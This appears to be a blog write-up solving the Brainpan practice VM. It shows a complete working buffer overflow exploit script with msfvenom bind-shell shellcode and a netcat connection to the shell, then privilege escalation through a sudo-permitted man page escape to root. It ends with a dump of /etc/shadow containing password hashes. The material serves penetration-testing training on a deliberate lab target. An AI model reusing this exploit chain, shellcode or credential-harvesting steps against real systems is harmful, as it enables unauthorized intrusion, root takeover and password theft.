BRAINPAN PENTEST VM SOLUTION BY 1N3
`7MN. `7MF'
__, MMN. M
`7MM M YMb M pd""b.
MM M `MN. M (O) `8b
MM M `MM.M ,89
MM M YMM ""Yb.
.JMML..JML. YM 88
(O) .M'
bmmmd'
# OVERVIEW
Brainpan is a test VM solution used for Pentesting/Hacking simulations. For more info, go to http://blog.techorganic.com/2013/03/brainpan-hacking-challenge.html. This walk through covers the basic steps to obtain "root" access to brainpan.
# DISCOVER HOSTS
netdiscover -r 192.168.1.0/24
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.1.132 00:0c:29:90:72:0d 01 060 VMware, Inc.
# PORT SCAN
nmap -sV 192.168.1.132
Nmap scan report for 192.168.1.132
Host is up (0.00041s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
9999/tcp open abyss?
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port9999-TCP:V=6.25%I=7%D=11/6%Time=5279FCEC%P=i686-pc-linux-gnu%r(NULL
SF:,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|\x
SF:20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x2
SF:0\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x20
SF:\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x20
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x20
SF:_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x20
SF:_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x20
SF:THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20>>\x20");
MAC Address: 00:0C:29:90:72:0D (VMware)
# DIRBUSTER
#scan 192.168.1.132:10000 with dirbuster
dirbuster &
# dirbuster shows a static index.html page, a static image file, a bin directory and a brainpan.exe within the brainpan directory.
# DOWNLOAD brainpan.exe
wget http://192.168.1.132/bin/brainpan.exe
# RUN brainpan.exe FROM WINE...
wine brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[!] bind failed: 10048[+] bind done on port 9999
[+] waiting for connections.
* FROM THIS, WE CAN DETERMINE THAT brainpan.exe IS RUNNING IN WINE FOR LINUX ON PORT 9999/TCP ON THE REMOTE HOST...
# DEBUGGING & FUZZING
# Transfer brainpan.exe to a Windows XP machine for debugging using OllyGDB or Immunity Debugger. Find which bytes overwrite EIP, find suitable JMP ESP address. Use msfvenom to create bind shell for Linux using the brainpan IP. Create working buffer overflow exploit (see below).
# GENERATE UNIQUE BUFFER
msf exploit(ms06_040_netapi) > ruby pattern_create.rb 1024
[*] exec: ruby pattern_create.rb 1024
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B
#!/usr/bin/python
#Brainpan.exe fuzzer by 1N3 - 20131122
import socket
target = "192.168.1.119"
# 1024 bit unique string
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B"
print "Fuzzing port 9999 with " +str(len(buffer))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((target,9999))
s.recv(1024)
print "Sending evil buffer..." + buffer
s.send(buffer)
s.close()
root@bt:/mnt/sdb/nonxero/scripts/fuzzers# ./brainpan_fuzz.py
Fuzzing port 9999 with 1024
Sending evil buffer...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B
root@bt:/mnt/sdb/nonxero/scripts/fuzzers#
msf exploit(ms06_040_netapi) > ruby pattern_offset.rb 35724134
[*] exec: ruby pattern_offset.rb 35724134
[*] Exact match at offset 524
* This means from 524-528 bytes, EIP is overwritten...
# CONSTRUCT OUR SHELLCODE...
msfvenom -p linux/x86/shell_bind_tcp LHOST=192.168.1.132 LPORT=4444 -b "x00" -e x86/shikata_ga_nai
[*] x86/shikata_ga_nai succeeded with size 105 (iteration=1)
buf =
"\xda\xcd\xd9\x74\x24\xf4\xbf\x7d\x7b\x06\xd9\x5d\x33\xc9" +
"\xb1\x14\x83\xed\xfc\x31\x7d\x15\x03\x7d\x15\x9f\x8e\x37" +
"\x02\xa8\x92\x6b\xf7\x05\x3f\x8e\x7e\x48\x0f\xe8\x4d\x0a" +
"\x2b\xab\x1f\x62\xce\x53\xb1\x2e\xa4\x43\xe0\x9e\xb1\x85" +
"\x68\x78\x9a\x88\xed\x0d\x5b\x17\x5d\x09\xec\x71\x6c\x91" +
"\x4f\xce\x08\x5c\xcf\xbd\x8c\x34\xef\x99\xe3\x48\x46\x63" +
"\x04\x20\x76\xbc\x87\xd8\xe0\xed\x05\x71\x9f\x78\x2a\xd1" +
"\x0c\xf2\x4c\x61\xb9\xc9\x0f"
# CREATE THE EXPLOIT...
# brainpan_exploit.py by 1N3 - 20131121
#
# `7MN. `7MF'
# __, MMN. M
#`7MM M YMb M pd""b.
# MM M `MN. M (O) `8b
# MM M `MM.M ,89
# MM M YMM ""Yb.
#.JMML..JML. YM 88
# (O) .M'
# bmmmd'
#
#
#!/usr/bin/python
import socket
import os
import subprocess
# vars
target = "192.168.1.132"
buffer1 = '\x41' * 520
ebp = '\x90' * 4
EIP = "\xf3\x12\x17\x31" #311712F3 JMP ESP brainpan.exe
command = "nc -vv 192.168.1.132 4444"
#shellcode bind shell port 4444 192.168.1.132
shellcode = ("\xd9\xea\xd9\x74\x24\xf4\xbb\xda\x05\x64\xb7\x5a\x29\xc9" +
"\xb1\x14\x31\x5a\x19\x03\x5a\x19\x83\xc2\x04\x38\xf0\x55" +
"\x6c\x4b\x18\xc6\xd1\xe0\xb5\xeb\x5c\xe7\xfa\x8a\x93\x67" +
"\xa1\x0c\x7e\x0f\x54\xb1\x6f\x93\x32\xa1\xde\x7b\x4a\x20" +
"\x8a\x1d\x14\x6e\xcb\x68\xe5\x74\x7f\x6e\x56\x12\xb2\xee" +
"\xd5\x6b\x2a\x23\x59\x18\xea\xd1\x65\x47\xc0\xa5\xd3\x0e" +
"\x22\xcd\xcc\xdf\xa1\x65\x7b\x0f\x24\x1c\x15\xc6\x4b\x8e" +
"\xba\x51\x6a\x9e\x36\xaf\xed")
# NOOP sled
NOOP_sled = '\x90' * 104
# construct entire buffer - 1004 bytes
buffer = buffer1 + ebp + EIP + NOOP_sled + shellcode
print "**********************************************"
print "buffer1 length: " +str(len(buffer1))
print "EIP length: " +str(len(EIP))
print "shellcode length: " +str(len(shellcode))
print "NOOP_sled length: " +str(len(NOOP_sled))
print "Total buffer length: " +str(len(buffer))
print "**********************************************"
print "Fuzzing " + target + " on port 9999 with " +str(len(buffer)) + " bytes"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((target,9999))
s.recv(1024)
print "Sending evil buffer..." + buffer
s.send(buffer)
print "Done..."
print "Connecting to bind shell..."
subprocess.call(command)
os.system(command)
print "Done..."
s.close()
exit
# EXPLOIT
root@bt:/scripts/fuzzers# ./brainpan_exploit.py
**********************************************
buffer1 length: 520
EIP length: 4
shellcode length: 105
NOOP_sled length: 104
Total buffer length: 737
**********************************************
Fuzzing 192.168.1.132 on port 9999 with 737 bytes
Sending evil buffer...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����� 1�����������������������������������������������������������������������������������������������������������t$���d�Z)ɱ 1Z Z �� 8�UlK �����\����g�
~T�o�2��{J � n�h�tnV ���k*#Y ��eG��"��ߡe{$ �KQj�6�
Done...
Connecting to bind shell...
nc -vv 192.168.1.132 4444
whoami
puck
pwd
/home/puck/web
# DISTRO VERSION
cat /etc/release
Ubuntu 12.10
uname -a
Linux version 3.5.0-25-generic
# PROCESSES
ps -auxxx
root 732 1 0 06:47 ? 00:00:00 /usr/sbin/winbindd -F
root 838 732 0 06:47 ? 00:00:00 /usr/sbin/winbindd -F
...
...
puck 910 909 0 06:47 ? 00:00:00 /bin/sh -c /home/puck/checksrv.sh
puck 911 910 0 06:47 ? 00:00:00 /bin/bash /home/puck/checksrv.sh
puck 926 911 0 06:47 ? 00:00:02 /usr/bin/python -m SimpleHTTPServer 10000
puck 1693 1 0 08:49 ? 00:00:00 /bin//sh
puck 1949 1 0 08:53 ? 00:00:00 /home/puck/web/bin/brainpan.exe
puck 1953 1 0 08:53 ? 00:00:00 /usr/bin/wineserver
puck 1959 1 0 08:53 ? 00:00:00 C:\windows\system32\services.exe
puck 1963 1 0 08:53 ? 00:00:00 C:\windows\system32\winedevice.exe MountMgr
puck 1972 1 0 08:53 ? 00:00:00 C:\windows\system32\plugplay.exe
# CRONTAB
cat /etc/crontab
# what can I do with this? file is owned by root and run by root but how to edit?
# m h dom mon dow command
* * * * * /home/puck/checksrv.sh
# SHOW LAST USERS TO LOGIN
#
last
root tty1 Mon Mar 4 13:43 - 13:43 (00:00)
anansi tty3 Mon Mar 4 12:17 - 13:38 (01:20)
anansi tty3 Mon Mar 4 12:17 - 12:17 (00:00)
puck tty3 Mon Mar 4 11:30 - 12:17 (00:47)
puck tty3 Mon Mar 4 11:30 - 11:30 (00:00)
puck tty2 Mon Mar 4 11:07 - 13:38 (02:30)
puck tty2 Mon Mar 4 11:07 - 11:07 (00:00)
anansi tty2 Mon Mar 4 11:03 - 11:07 (00:04)
anansi tty2 Mon Mar 4 11:03 - 11:03 (00:00)
anansi tty2 Mon Mar 4 10:58 - 10:59 (00:01)
anansi tty2 Mon Mar 4 10:58 - 10:58 (00:00)
reynard tty1 Mon Mar 4 10:48 - 13:43 (02:54)
reynard tty1 Mon Mar 4 10:48 - 10:48 (00:00)
# USERS
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash
# SEARCH HOME DIRECTORY FILES
ls -lhaR /home/
/home/puck/.wine:
total 816K
drwxrwxr-x 4 puck puck 4.0K Nov 19 08:53 .
drwx------ 11 puck puck 4.0K Nov 19 08:51 ..
-rw-rw-r-- 1 puck puck 11 Mar 4 2013 .update-timestamp
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 dosdevices
drwxrwxr-x 5 puck puck 4.0K Mar 4 2013 drive_c
-rw-rw-r-- 1 puck puck 761K Nov 19 08:53 system.reg
-rw-rw-r-- 1 puck puck 26K Nov 19 08:53 user.reg
-rw-rw-r-- 1 puck puck 2.1K Mar 4 2013 userdef.reg
/home/puck/.wine/dosdevices:
total 8.0K
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 .
drwxrwxr-x 4 puck puck 4.0K Nov 19 08:53 ..
lrwxrwxrwx 1 puck puck 10 Mar 4 2013 c: -> ../drive_c
lrwxrwxrwx 1 puck puck 1 Mar 4 2013 z: -> /
/home/puck/.wine/drive_c:
total 20K
drwxrwxr-x 5 puck puck 4.0K Mar 4 2013 .
drwxrwxr-x 4 puck puck 4.0K Nov 19 08:53 ..
drwxrwxr-x 4 puck puck 4.0K Mar 4 2013 Program Files
drwxrwxr-x 4 puck puck 4.0K Mar 4 2013 users
drwxrwxr-x 13 puck puck 4.0K Mar 4 2013 windows
/home/puck/.wine/drive_c/Program Files:
total 16K
drwxrwxr-x 4 puck puck 4.0K Mar 4 2013 .
drwxrwxr-x 5 puck puck 4.0K Mar 4 2013 ..
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 Common Files
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 Internet Explorer
/home/puck/.wine/drive_c/Program Files/Common Files:
/home/puck/web:
total 816K
drwxrwxr-x 3 puck puck 4.0K Mar 4 2013 .
drwx------ 11 puck puck 4.0K Nov 19 08:51 ..
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 bin
-rw-rw-r-- 1 puck puck 215 Mar 4 2013 index.html
-rw------- 1 puck puck 797K Mar 4 2013 soss-infographic-final.png
/home/puck/web/bin:
total 32K
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 .
drwxrwxr-x 3 puck puck 4.0K Mar 4 2013 ..
-rwxr-xr-x 1 puck puck 21K Mar 4 2013 brainpan.exe
# What development tools/languages are installed/supported?
which perl
which python
/usr/bin/perl
/usr/bin/python
# How can files be uploaded?
which wget
which nc
which netcat
which scp
which ftp
/usr/bin/wget
/bin/nc
/bin/netcat
/usr/bin/scp
/usr/bin/ftp
# RUNNING PORTS/SERVICES
# Both services running as user 'puck'... not sure that will help me get root....
lsof -i:9999
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
brainpan. 1949 puck 10u IPv4 26008 0t0 TCP *:9999 (LISTEN)
brainpan. 1949 puck 11u IPv4 26008 0t0 TCP *:9999 (LISTEN)
wineserve 1953 puck 27u IPv4 26008 0t0 TCP *:9999 (LISTEN)
lsof -i:10000
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
python 926 puck 3u IPv4 8661 0t0 TCP *:webmin (LISTEN)
# RUNNING SERVICES LOCALLY
netstat -luntp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:9999 0.0.0.0:* LISTEN 1756/brainpan.exe
tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN 924/python
udp 0 0 0.0.0.0:39859 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* - what's this port do?
udp6 0 0 :::22091 :::*
# BREAK OUT OF NETCAT SHELL TO BASH SHELL
python -c 'import pty;pty.spawn("/bin/bash")'
puck@brainpan:/home/puck/privesc$ ls
ls
allfiles.tar.gz linux_gather_files.sh linux_privesc_check
linux_checksec.sh linux_priv_esc.sh out
puck@brainpan:/home/puck/privesc$
# CHECK SUDO COMMANDS AVAILABLE
puck@brainpan:/home/puck$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util man ls
sudo /home/anansi/bin/anansi_util man ls
'unknown': unknown terminal type.
# RUN SUDO COMMAND TO ENTER MAN PAGES
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual man
MAN(1) Manual pager utils MAN(1)
NAME
man - an interface to the on-line reference manuals
SYNOPSIS
man [-C file] [-d] [-D] [--warnings[=warnings]] [-R encoding] [-L
locale] [-m system[,...]] [-M path] [-S list] [-e extension] [-i|-I]
[--regex|--wildcard] [--names-only] [-a] [-u] [--no-subpages] [-P
pager] [-r prompt] [-7] [-E encoding] [--no-hyphenation] [--no-justifi‐
cation] [-p string] [-t] [-T[device]] [-H[browser]] [-X[dpi]] [-Z]
[[section] page ...] ...
man -k [apropos options] regexp ...
man -K [-w|-W] [-S list] [-i|-I] [--regex] [section] term ...
man -f [whatis options] page ...
man -l [-C file] [-d] [-D] [--warnings[=warnings]] [-R encoding] [-L
locale] [-P pager] [-r prompt] [-7] [-E encoding] [-p string] [-t]
[-T[device]] [-H[browser]] [-X[dpi]] [-Z] file ...
man -w|-W [-C file] [-d] [-D] page ...
man -c [-C file] [-d] [-D] page ...
man [-hV]
DESCRIPTION
Manual page man(1) line 1 (press h for help or q to quit)
DESCRIPTION
man is the system's manual pager. Each page argument given to man is
Manual page man(1) line 2 (press h for help or q to quit)!/bin/bash
# TYPE !/bin/bash TO EXECUTE COMMANDS WITHIN MAN PAGE (WHICH WILL RUN AS "ROOT")
!/bin/bash
root@brainpan:/usr/share/man# whoami
whoami
root
root@brainpan:/usr/share/man#
# GATHER /etc/shadow file
root@brainpan:/usr/share/man# cat /etc/shadow
cat /etc/shadow
root:$6$m20VT7lw$172.XYFP3mb9Fbp/IgxPQJJKDgdOhg34jZD5sxVMIx3dKq.DBwv.mw3HgCmRd0QcN4TCzaUtmx4C5DvZaDioh0:15768:0:99999:7:::
daemon:*:15768:0:99999:7:::
bin:*:15768:0:99999:7:::
sys:*:15768:0:99999:7:::
sync:*:15768:0:99999:7:::
games:*:15768:0:99999:7:::
man:*:15768:0:99999:7:::
lp:*:15768:0:99999:7:::
mail:*:15768:0:99999:7:::
news:*:15768:0:99999:7:::
uucp:*:15768:0:99999:7:::
proxy:*:15768:0:99999:7:::
www-data:*:15768:0:99999:7:::
backup:*:15768:0:99999:7:::
list:*:15768:0:99999:7:::
irc:*:15768:0:99999:7:::
gnats:*:15768:0:99999:7:::
nobody:*:15768:0:99999:7:::
libuuid:!:15768:0:99999:7:::
syslog:*:15768:0:99999:7:::
messagebus:*:15768:0:99999:7:::
reynard:$6$h54J.qxd$yL5md3J4dONwNl.36iA.mkcabQqRMmeZ0VFKxIVpXeNpfK.mvmYpYsx8W0Xq02zH8bqo2K.mkQzz55U2H5kUh1:15768:0:99999:7:::
anansi:$6$hblZftkV$vmZoctRs1nmcdQCk5gjlmcLUb18xvJa3efaU6cpw9hoOXC/kHupYqQ2qz5O.ekVE.SwMfvRnf.QcB1lyDGIPE1:15768:0:99999:7:::
puck:$6$A/mZxJX0$Zmgb3T6SAq.FxO1gEmbIcBF9Oi7q2eAi0TMMqOhg0pjdgDjBr0p2NBpIRqs4OIEZB4op6ueK888lhO7gc.27g1:15768:0:99999:7:::
No comments:
Post a Comment